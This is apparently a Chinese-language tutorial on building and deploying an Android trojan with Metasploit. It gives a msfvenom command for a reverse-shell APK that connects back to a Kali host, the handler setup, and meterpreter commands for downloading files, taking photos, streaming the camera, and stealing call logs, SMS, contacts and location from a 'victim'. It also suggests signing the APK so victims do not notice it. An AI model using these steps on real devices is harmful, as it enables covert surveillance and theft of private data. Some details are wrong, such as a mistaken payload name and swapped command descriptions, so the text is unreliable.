Metasploit之渗透安卓实战
在之前的Metaspoloit使用中都是在Windows系统中,因为渗透的是Windows系统,所以选用了“windows/meterpreter/reverse_tcp”模块。 而这里需要渗透安卓系统了,就选用“android/meterpreter/reverse_tcp”模块。 那么对于kali-linux连接木马的方式还是和之前的一样,利用“exploit/multi/handler” 并且,同样需要选用“windows/meterpreter/reverse_tcp”的PAYLOAD 这里假设我的测试环境 kali-linux: 192.168.2.146 安卓模拟环境:192.168.2.107 |
一、生成远程安卓木马
msfconsole msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=4444 R > payload.apk |
命令解析:
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机(kali-linux的IP)
LPORT 设置用来接收反弹连接的端口(kali-linux的端口)
R 设置文件格式
Location 要保存的文件位置–>/root/Desktop/是桌面,没有目录表示当前系统Home目录下
PS:对于目前的安卓系统安全机制的考虑,因为没有签名证书可能导致无法安装或易被受害者识破
那么,签名证书的制作可以查看参考文献资料
二、开启metasploit,并且开启相关连接
msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST 192.168.2.146 set LPORT 4444 exploit |
三、meterpreter连接
安卓手机安装并且打开木马后会返回我们一个meterpreter连接,那么我们可以使用以下的一些常用的命令:cd –>目录切换,命令:cd / 切换到根目录 search –>搜索文件,命令:search text.jpg download –>下载文件,命令:download test.jpg webcam_list –>查看摄像头列表,因为手机都是前置和后置摄像头了 webcam_snap –>拍照一张,需要选用前置或者后置摄像头,命令:webcam_snap -i 1 webcam_stream –>开启摄像头视频监控,同上,命令:webcam_stream -i 1 安卓系统相关命令: check_root –>查看当前安卓是否已经root dump_calllog –>下载通话记录 dump_contacts –>下载短信记录 dump_sms –>下载通讯录 geolocate –>利用谷歌地图定位(需要安装谷歌地图) |